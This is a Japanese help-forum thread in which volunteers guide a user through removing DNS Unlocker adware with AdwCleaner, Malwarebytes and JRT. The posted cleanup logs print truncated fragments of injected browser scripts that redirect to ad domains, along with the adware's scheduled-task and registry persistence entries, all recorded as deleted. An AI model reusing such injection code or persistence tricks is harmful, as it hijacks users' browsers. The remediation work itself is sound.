有効 Task Superclean Super PC Tools Ltd c:\programdata\{8af9c87d-c817-cd80-8af9-9c87dc8121f7}\hqghumeaylnlf.exe --startup=1 --single
有効 Task UALU notificatin Acer Incorporated "C:\Program Files\Acer\Acer Updater\UALU.exe"
有効 Task {D0CA0B4E-A50D-488A-974E-DEB3A0548969} Google Inc. "c:\program files (x86)\google\chrome\application\chrome.exe" http://ui.skype.com/ui/0/6.20.0.104/ja/abandoninstall?page=tsProgressBar
有効 Task {F51C8655-EEE7-4AE9-BD50-27F95EBF038F} Microsoft Corporation C:\Windows\system32\pcalua.exe -a E:\install.exe -d E:\ -c /a


cc コンテキストメニュー ------------------------------

有効 Directory 7-Zip Igor Pavlov C:\Program Files\7-Zip\7-zip.dll
有効 Directory DropboxExt Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll
有効 Directory ShExplzh pon software C:\Windows\SysWOW64\ShExplzh.dll
有効 Directory ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 Directory VLCメディアプレイヤーで再生 VideoLAN "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1"
有効 Directory VLCメディアプレイヤーのプレイリストに追加 VideoLAN "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1"
有効 Directory 書庫内検索(I)... pon software C:\Program Files\Explzh\Explzh.exe /f %1
有効 Drive ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 Drive 書庫内検索(I)... pon software C:\Program Files\Explzh\Explzh.exe /f %1
有効 File 7-Zip Igor Pavlov C:\Program Files\7-Zip\7-zip.dll
有効 File DropboxExt Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll
有効 File MWLIVShellExt Egis Technology Inc. C:\Program Files (x86)\EgisTec MyWinLocker\x64\MWLIVShellExt.dll
有効 File ShExplzh pon software C:\Windows\SysWOW64\ShExplzh.dll
有効 File ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 File ShredderContextMenu Egis Technology Inc. C:\Program Files (x86)\EgisTec Shredder\x64\ShredderContextMenu.dll
有効 Folder ShExplzh64 pon software C:\Windows\system32\shexplzh.dll


以上です、よろしくお願いします。

  • あすとろ
  • 2015/09/08 (Tue) 00:59:19
返信フォームへ 
力技でChromeの削除から
作業と報告、ご苦労様です。

>少しだけですがブラウザを使ってみたところ症状は未だ収まっていない状態です

はい、わかりました。
WindowsUpdate不具合についてはIVNOさんがパッチファイルを作ってくれたので、こちらを試してみてください。
http://respondent.bbs.fc2.com/?act=reply&tid=6857478

続きのログも見せてもらって、隠れていたものがあぶり出されてきました。
ではまた説明に沿って続きの作業です。

まずChromeのブックマークで必要なものがあったら、ブクマをエクスポート(バックアップ)しておいてください。
一度Chromeを削除するのでその準備です。

準備できたらセーフモードでGUを使って、下記をアンインストールしてください。
>Google Chrome Google Inc. 2015/09/03 45.0.2454.85
>Google 日本語入力 Google Inc. 2015/09/03 87.1 MB 2.17.2267.0

削除したら通常モードでPC再起動後、ディスククリーンアップのあと、目視でCドライブを開いて下記のフォルダを探して、見つかったらそれを削除してください。
C:\Program Files (x86)\Google

C:\Users\ユーザー名\AppData\Local\Google

C:\Users\ユーザー名\AppData\LocalLow\Google

見つかったらそれを手動で削除してください。探しても見つからないものはスルーでいいです。

ここまでできたら一度PC再起動後、今度はGoogle公式サイトからまたChromeの最新版をダウンロードと再インストールすれば、曲者拡張も消えるはずです。

ですが今後Chromeを使わないなら、再インストールもしなくていいです。
むしろこの方が対応としては楽でしょう。

今度はCCを起動して「スケジュールされたタスク」タブ内の下記を右クリックから「無効」にしたあと続けて「エントリの削除」してください。
有効 Task ASP "C:\Program Files (x86)\RCP\systweakasp.exe" /verysilent

有効 Task DNSKINGSTON C:\Program Files (x86)\DNS Unlocker\dnskingston.exe /Scheduled

有効 Task Superclean Super PC Tools Ltd c:\programdata\{8af9c87d-c817-cd80-8af9-9c87dc8121f7}\hqghumeaylnlf.exe --startup=1 --single

有効 Task {F51C8655-EEE7-4AE9-BD50-27F95EBF038F} Microsoft Corporation C:\Windows\system32\pcalua.exe -a E:\install.exe -d E:\ -c /a

無効にできないときはそのまま削除でもいいです。

このあと一度PC再起動後に、Chromeを入れなおしていたらChromeを起動してしばらくPC状態を様子見後、CCでChromeタブとスケジュールタブのログだけ取り直して、それを状態報告とともにレスください。

うまくいけばこの時点でいくらか沈静化できるかもしれませんが、沈静化の有無にかかわらずまだ「解決」にはならないので、その点もあまり焦らなくていいです
  • 悪代官
  • 2015/09/08 (Tue) 20:38:03
返信フォームへ 
Re: DNSunlockerの感染
>WindowsUpdate不具合についてはIVNOさんがパッチファイルを作ってくれたので、こちらを試してみてください。

わざわざパッチまで作っていただいてありがとうございます。ですがパッチをあてても問題は解決せず、今度は「エラーコード:80070002」と表示されます。

https://support.microsoft.com/ja-jp/kb/910336

上記urlを参考にしてみましたが変化はありません。


choromeの件ですがやはり自分にとって使いやすいブラウザなので再インストールすることにしました。
状況報告ですが、以前のように変なリンク先に飛ばされることはなくなり、choromeでは沈静したかのように思えます。

下記にログを貼ります。


chorome------------------

有効 App Gmail 8.1 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0
有効 App Google Search 0.0.0.30 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0
有効 App Google ドライブ 14.0 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.0_0
有効 App YouTube 4.2.7 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0
有効 Extension Google スプレッドシート 1.1 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0
有効 Extension Google スライド 0.9 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0
有効 Extension Google ドキュメント 0.9 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0
有効 Extension Google ドキュメント オフライン 0.5 ユーザー 1 C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\0.5_1


スケジュール---------------------

有効 Task Adobe Acrobat Update Task Adobe Systems Incorporated C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /c
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /ua /installsource scheduler
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
有効 Task PMMUpdate Egis Technology Inc. "C:\Program Files\EgisTec IPS\PMMUpdate.exe"
有効 Task UALU notificatin Acer Incorporated "C:\Program Files\Acer\Acer Updater\UALU.exe"
有効 Task {D0CA0B4E-A50D-488A-974E-DEB3A0548969} Google Inc. "c:\program files (x86)\google\chrome\application\chrome.exe" http://ui.skype.com/ui/0/6.20.0.104/ja/abandoninstall?page=tsProgressBar
  • あすとろ
  • 2015/09/09 (Wed) 08:57:58
返信フォームへ 
こちらもお試しください
先ほどのURLは主にWindows XP用のものとなります。
念のためこちらもお試しください。
http://windows.microsoft.com/ja-jp/windows/windows-update-error-80070002#1TC=windows-7

その他の作業につきましては悪代官さんのご案内をお待ちください。
  • IVNO
  • MAIL
  • 2015/09/09 (Wed) 16:17:00
返信フォームへ 
Re: DNSunlockerの感染
>先ほどのURLは主にWindows XP用のものとなります。
念のためこちらもお試しください。
http://windows.microsoft.com/ja-jp/windows/windows-update-error-80070002#1TC=windows-7

こちらも試してみましたが駄目でした…

まだ解決には至ってないので解決後、再度試してみたいと思います。
  • あすとろ
  • 2015/09/10 (Thu) 01:47:53
返信フォームへ 
ではMBAM安定版で作業です
レスが遅くなってすみません。

>こちらも試してみましたが駄目でした…

はい、ではChrome自体は入れなおしで沈静化したようなので、とりあえず次を進めていきましょうか。

今度は下記のツールを準備してください。
「AdwCleaner」(通称:AC)
http://www.bleepingcomputer.com/download/adwcleaner/dl/125/
ファイル直リンです。アクセスしてファイルをデスクトップにでも保存しておいてください。
片付けるときは起動後に「uninstall」ボタンを押せば自動で削除されます。
使い方は下記サイト様に詳しい説明があるのでサンショウウオ↓
http://www.japan-secure.com/entry/adwcleaner.html

Malwarebytes' Anti-Malware(通称・MBAM)
本家サイト
http://www.malwarebytes.org/

ですが、MBAMは現在安定性や動作でかなり難が出ており、普通に使っても正常にスキャンができないバグまで多発中です。
そのため本家サイトから最新版のダウンロードせず、ここではあえて旧バージョンで作業します。

旧バージョンの説明サイト↓
http://www.japan-secure.com/entry/blog-entry-7.html

以下のURLからMBAMの旧バージョンをダウンロードしてください。
http://www.oldapps.com/malwarebytes.php?old_malwarebytes=12090?download
ファイル直リンです。保存しておいてください。

注)インストール時に日本語でインストールすると文字化けすることがあります。英語でインストール後に日本語化してください。
MBAM起動して「Settings」タブ→「Language」→「Japanese」で日本語化できます。

準備できたらMBAMをインストールとアップデートまでしておいてください。
ただし、ここではまだスキャンはしないように。
なお、ここでMBAMの更新で「プログラム」自体は更新せず、定義だけ更新しておいてください。
プログラム本体を更新すると、バグ多発中の最新版になってしまうので、せっかく旧バージョンでインストールした意味がなくなります。

続いてここで一度ACを起動してください。
起動するとまず定義の更新が行われるはずなので、更新だけしてから、それができたらACは一旦終了してください。
ここではスキャンもしなくていいです。

両ツールのアップデートができたらPCをセーフモードで再起動してから、ディスククリーンアップを使ってゴミファイルの掃除してください。

続いてPCをセーフモード起動してから、先に一度起動したACを再度起動してください。
起動したら今度は「スキャン」したあと、そのスキャン終了後に検出されたものがあったら「除去」を押してください。
表示された画面で「はい」を選択すると処置開始されます。

処置完了したらそこでPCを通常モードで再起動してください。

再起動後にACのあらたなログが出るので、それをデスクトップにでも保存しておいてください。
ですが、もし作業後にログが出ないorわからない場合はマイコンピュータのCドライブを開くとその直下に以下のような名前のファイルが作成されているので、それがACのログです。
>AdwCleaner[英数字].txt
同じような名前のログが複数ある時は、作成日時が作業処置時のファイルが対象のログです。

ACでの作業ができたら次はMBAMの作業です。
セーフモードのままMBAM起動してスキャンしてください。
MBAM起動したら「スキャナー」タブから「フルスキャン」です。
対象ドライブはCを含めて全ドライブを選択してください。
ですが、もし「フルスキャン」というボタンが表示されない場合はMBAMを最新版に更新してしまった可能性があるので、この時は「カスタムスキャン」を選択してください。
この操作が最新版MBAMでのフルスキャンにあたります。
スキャン対象は全ドライブを選択(チェック)してください。時間はかかりますができるだけ細かくスキャンするためです。
順番はどちらからでもいいですが、なにか検出されたらそれを選択して「remove」(隔離)したあと、再起動を促す表示が出たらそこで一度PCを再起動してください。
もし再起動表示が出ないときは手動で再起動してください。

またMBAMスキャン終了後、「詳細を表示」を押すとその結果が表示されるはずなので、そこで「ログを保存」を押すとそのログが保存可能になります。
そのログをデスクトップにでも保存しておいてください。
このログ確認が特に重要なので、忘れないようにお願いします。

このあとしばらくPC状態を様子見後、作業後に保存したACとMBAMのログを返信に貼り付けて、それを状態報告とともにレスで見せてください。
  • 悪代官
  • 2015/09/10 (Thu) 07:49:51
返信フォームへ 
Re: DNSunlockerの感染
遅くなりました。

MBAMでのフルスキャンが終わり、ログを保存しようとしたのですが「詳細を表示」をクリックするとポップアップが表示されたのでOKを押すとログを保存する前に削除されてしまいました…

設定タブをみると「スキャンの完了後、自動的にログファイルを保存する。」というところにチェックが入っているので保存されているとは思いますが、場所が分からずに質問にきました。
  • あすとろ
  • 2015/09/10 (Thu) 20:10:43
返信フォームへ 
MBAMログの確認手順です
作業と報告、ご苦労様です。

MBAMのログ保存で詰まってますか。
では以下の手順でログを確認してみてください。

まず旧バージョンMBAMを起動したら「ログ」タブを開いてください。

そこでMBAMでスキャンした日時ごとのリストが出るので、その中で作業した日時のログを選択して「開く」ボタンを押してください。

普通はこれでログが表示されるので、そのログをまたレスで見せてください。
ですがここでもログが見当たらなければMBAMログはスルーして、そのことだけ教えてください
  • 悪代官
  • 2015/09/10 (Thu) 21:13:10
返信フォームへ 
Re: DNSunlockerの感染
確認しましたが、ログはありませんでした。

些細なことですが検出されたファイルは12個と表示されていました。
  • あすとろ
  • 2015/09/10 (Thu) 22:10:42
返信フォームへ 
Re: DNSunlockerの感染
ACの作業は終わっているので先にログを貼ります。

# AdwCleaner v5.007 - ログファイルの作成日 10/09/2015 作成時間 16:29:30
# 更新日 08/09/2015 作成元 Xplode
# データベース : 2015-09-08.2 [サーバー]
# オペレーティングシステム : Windows 7 Home Premium Service Pack 1 (x64)
# ユーザー名 : 【ユーザー名】
# 実行場所 : C:\Users\【ユーザー名】\Desktop\AdwCleaner.exe
# オプション : 削除
# サポート : http://toolslib.net/forum

***** [ サービス ] *****


***** [ フォルダ ] *****

[-] フォルダ 削除済み項目 : C:\Program Files (x86)\LibraryModule
[-] フォルダ 削除済み項目 : C:\ProgramData\apn
[-] フォルダ 削除済み項目 : C:\ProgramData\IHProtectUpDate
[-] フォルダ 削除済み項目 : C:\ProgramData\2e5e509600007f88
[-] フォルダ 削除済み項目 : C:\ProgramData\3a93476400003d67
[-] フォルダ 削除済み項目 : C:\ProgramData\486547940152927884
[-] フォルダ 削除済み項目 : C:\ProgramData\ab6f77b800000244
[-] フォルダ 削除済み項目 : C:\ProgramData\b717da8c00001308
[-] フォルダ 削除済み項目 : C:\ProgramData\{8af9c87d-c817-cd80-8af9-9c87dc8121f7}
[-] フォルダ 削除済み項目 : C:\Users\【ユーザー名】\AppData\Roaming\OpenCandy
[-] フォルダ 削除済み項目 : C:\Users\【ユーザー名】\AppData\Roaming\Systweak

***** [ ファイル ] *****

[-] ファイル 削除済み項目 : C:\END
[-] ファイル 削除済み項目 : C:\Program Files (x86)\mozilla firefox\dbghelp.dll
[-] ファイル 削除済み項目 : C:\Windows\Sysnative\roboot64.exe
[-] ファイル 削除済み項目 : C:\Windows\Sysnative\drivers\{72074a89-563a-4402-894b-cfea7ec6858b}Gw64.sys

***** [ ショートカット ] *****


***** [ スケジュールタスク ] *****


***** [ レジストリ ] *****

[-] キー 削除済み項目 : HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\WindowsMangerProtect
[-] キー 削除済み項目 : HKCU\Software\Mozilla\Extends
[-] キー 削除済み項目 : HKLM\SOFTWARE\5da059a482fd494db3f252126fbc3d5b
[-] キー 削除済み項目 : HKLM\SOFTWARE\90327e2b-5082-dd87-c103-0f092310d727
[-] キー 削除済み項目 : HKLM\SOFTWARE\c6bad4c9-8421-425b-1b68-21b04eceea82
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{cde50c8b}
[-] 値 削除済み項目 : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [faststartff@gmail.com]
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{A2D733A7-73B0-4C6B-B0C7-06A432950B66}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{1DB3812C-B5BC-4714-8F98-4669354B6000}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{41F978F3-431A-4464-A789-5C0692D562FB}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{5ADB067E-40D9-49AD-BDFC-2DBD725D3842}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{89310413-97E0-4F09-AA75-390A7F4D4918}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{917A80E3-C425-4F5F-B8D3-4804A0CCA924}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{A1965763-A486-4E1E-B574-19E44B3842E8}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{B83055E5-D13F-4DB9-A034-3B89A4CFE680}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{BB2DE3E8-09DB-47F2-8F99-658751BFB500}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{C3510196-382C-41D1-8E63-6E84DB3709C9}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{EB559340-3A8F-4456-B24D-160098054EF0}
[-] キー 削除済み項目 : [x64] HKLM\SOFTWARE\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52}
[-] キー 削除済み項目 : [x64] HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
[-] キー 削除済み項目 : [x64] HKLM\SOFTWARE\Classes\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}
[-] キー 削除済み項目 : [x64] HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
[-] キー 削除済み項目 : HKU\.DEFAULT\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
[-] キー 削除済み項目 : HKCU\Software\InstallCore
[-] キー 削除済み項目 : HKCU\Software\systweak
[-] キー 削除済み項目 : HKCU\Software\UpdateStar
[-] キー 削除済み項目 : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
[-] キー 削除済み項目 : HKCU\Software\AppDataLow\Software\ViewPassword
[-] キー 削除済み項目 : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
[-] キー 削除済み項目 : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
[-] キー 削除済み項目 : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
[-] キー 削除済み項目 : HKLM\SOFTWARE\SupTab
[-] キー 削除済み項目 : HKLM\SOFTWARE\systweak
[-] キー 削除済み項目 : HKLM\SOFTWARE\IHProtect
[-] キー 削除済み項目 : HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{614925F9-841A-53FE-A28F-DC30FA07239B}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8B114619-78B7-1CFF-55EF-74266954F883}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}_is1
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7540FDBD-7FDC-30AE-3778-815CB87DBE46}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F6423EE4-93D8-FA04-D09D-A8598F6EFDFD}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{10A0E600-D246-BD63-F465-4C849C688998}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5E03DFA7-51FC-7C12-CEE5-4D75FBB01E8F}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7E7FAE3D-3358-D280-8DBF-E8E2D94326D1}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EE171732-BEB4-4576-887D-CB62727F01CA}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B10BC31B-DBC6-56FE-DD3D-DD4E49A3E6CE}
[-] キー 削除済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2616871-3463-BCEE-5AFA-73773317A381}
[!] キー ノット 削除済み項目 : [x64] HKCU\Software\InstallCore
[!] キー ノット 削除済み項目 : [x64] HKCU\Software\systweak
[!] キー ノット 削除済み項目 : [x64] HKCU\Software\UpdateStar
[!] キー ノット 削除済み項目 : HKU\S-1-5-21-2268393351-900118556-74167924-1000\Software\AppDataLow\Software\ViewPassword
[-] データ 復元済み項目 : HKCU\Software\Microsoft\Internet Explorer\Main [Search Page]
[-] データ 復元済み項目 : HKU\S-1-5-21-2268393351-900118556-74167924-1000\Software\Microsoft\Internet Explorer\Main [Search Page]

***** [ Webブラウザ ] *****

[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.4u0dFaxhuTzGvfiD.scode", "(function(){try{if(window.location.href.indexOf(\"rjg4pdC5rjC8qjY9qTw5rHa8rTw\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\[...]
[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.ES2GPs0mln4WhkmQ.scode", "(function(){try{if(window.location.href.indexOf(\"rHU6pjw7qda7pjnErdg8pda8rn\")>-1){return;}}catch(e){}try{var d=[[\"cryptogmail.com\",\"bancdebinary.co[...]
[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.FCjaZCGs31M2vgEr.scode", "(function(){try{if(window.location.href.indexOf(\"rjg4pdC5rjC8qjY9qTw5rHa8rTw\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\[...]
[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.HL9UWkqiOWgLo30O.scode", "(function(){try{if(window.location.href.indexOf(\"rHU6pjw7qda7pjnErdg8pda8rn\")>-1){return;}}catch(e){}try{var d=[[\"cryptogmail.com\",\"bancdebinary.co[...]
[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.doCfAZEi4WbW8ZlS.scode", "(function(){try{if(window.location.href.indexOf(\"rjg4pdC5rjC8qjY9qTw5rHa8rTw\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\[...]
[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.gVloVT64oSQvcz0v.scode", "(function(){try{if(window.location.href.indexOf(\"rHU6pjw7qda7pjnErdg8pda8rn\")>-1){return;}}catch(e){}try{var d=[[\"cryptogmail.com\",\"bancdebinary.co[...]
[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.iO9wA7wGp2hsyOy3.scode", "(function(){try{if(window.location.href.indexOf(\"rjg4pdC5rjC8qjY9qTw5rHa8rTw\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\[...]
[-] [C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\prefs.js] [Preference] 削除済み項目 : user_pref("extensions.tregO40J4Sa4e0xe.scode", "(function(){try{if(window.location.href.indexOf(\"rjg4pdC5rjC8qjY9qTw5rHa8rTw\")>-1){return;}}catch(e){}try{var d=[[\"www.ewoss.com\",\"livewebcams.xyz\[...]
[-] [C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Homepage] 削除済み項目 : hxxp://search.conduit.com/?gd=&ctid=CT3321540&octid=EB_ORIGINAL_CTID&ISID=M88EA6552-C4B1-4C2F-8B94-6DCB9463696E&SearchSource=55&CUI=&UM=5&UP=SPE05EDA6A-3482-4565-8186-45BFDF5738DC&SSPV=

*************************

:: Winsock設定を初期化しました

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [9836 バイト] ##########
  • あすとろ
  • 2015/09/11 (Fri) 00:33:22
返信フォームへ 
ACとMBAMは削除しJRTでスキャンを
こんばんは、IVNOと申します。
悪代官さんがご多忙でレスできないとのことですので、引き継がせていただきます。

MBAMのログは確認できなかったと言うことですね。
ACでは大量に検出され、処置されています。
ACもMBAMも不要となります。
ACを起動させてアンインストールボタンを押して削除し、MBAMはGUを使って削除なされてください。
手動駆除に移行する前に少しでも多く駆除しておきましょう。

以下のソフトウェアをご用意ください。

Malwarebytes Junkware Removal tool(通称:JRT)
http://downloads.malwarebytes.org/file/jrt
クリックするとファイルがダウンロードされますので、わかりやすい場所に保存なされてください。
削除時は本体ごとゴミ箱に入れて削除してください。

準備ができたら作業を開始いたします。
今回の作業は通常モードのままで結構です。
JRTを起動させてください。
エンターキーなどのキーを押してスキャンを開始します。
検出された場合は再起動するかと問われますが、Nキーを押して再起動はキャンセルしてください。
すべての検出が終わると結果が表示されますので、わかりやすい場所に保存してください。
保存が完了しましたら、一度PCを再起動させてください。
再起動が完了しましたら、JRTのログを貼り付けてご連絡をお願いいたします。
  • IVNO
  • MAIL
  • 2015/09/11 (Fri) 01:45:27
返信フォームへ 
Re: DNSunlockerの感染
おはようございます。

>悪代官さんがご多忙でレスできないとのことですので、引き継がせていただきます。
お疲れ様です、引き続きよろしくお願いします。

早速ですが、JRTのログになります。


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 7.6.1 (09.08.2015:1)
OS: Windows 7 Home Premium x64
Ran by 【ユーザー名】 on 2015/09/11 at 9:32:12.34
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services

Successfully deleted: [Service] {72074a89-563a-4402-894b-cfea7ec6858b}Gw64 [Reboot required]



~~~ Tasks



~~~ Registry Values



~~~ Registry Keys



~~~ Files

Successfully deleted: [File] C:\Users\【ユーザー名】\AppData\Roaming\appdataFr2.bin
Successfully deleted: [File] C:\Users\【ユーザー名】\AppData\Roaming\appdataFr25.bin



~~~ Folders

Successfully deleted: [Empty Folder] C:\Users\【ユーザー名】\Appdata\Local\{56E7EB77-E331-4D13-8347-4BDACD0A07A9}
Successfully deleted: [Empty Folder] C:\Users\【ユーザー名】\Appdata\Local\{9356F216-A6AC-44FF-B942-0AA5DD8D12F4}
Successfully deleted: [Empty Folder] C:\Users\【ユーザー名】\Appdata\Local\{96A68A8B-71DF-4F8C-A23A-EE59604C4633}
Successfully deleted: [Empty Folder] C:\Users\【ユーザー名】\Appdata\Local\{ACFF6CF9-5C5C-47DA-8296-65B05713BF11}
Successfully deleted: [Folder] C:\Windows\SysWOW64\ai_recyclebin



~~~ FireFox

Successfully deleted the following from C:\Users\【ユーザー名】\AppData\Roaming\mozilla\firefox\profiles\i4n38c5y.default\prefs.js

user_pref(extensions.BU9VxlWSf7xOHT97.scode, (function(){try{if(window.self.location.href.indexOf(\rHU6pjw7qda7pjnErdg8pda8rn\)>-1){return;}}catch(e){}try{var d=[[\trian
user_pref(extensions.BU9VxlWSf7xOHT97.url, hxxp://sweetdiaryset.info/sync2/?q=hfZ9oenGhchEAen0rihTB6lKDzt4okPntNtVh7n0rjkErTs6rjUGrdw8tMFHhd9Fqja9rjgFqHwGrjgMDMlGojUMAe4Uoj
user_pref(extensions.aMgjLFK2Ue6BTnyh.scode, (function(){try{if(window.self.location.href.indexOf(\rHU6pjw7qda7pjnErdg8pda8rn\)>-1){return;}}catch(e){}try{var d=[[\trian
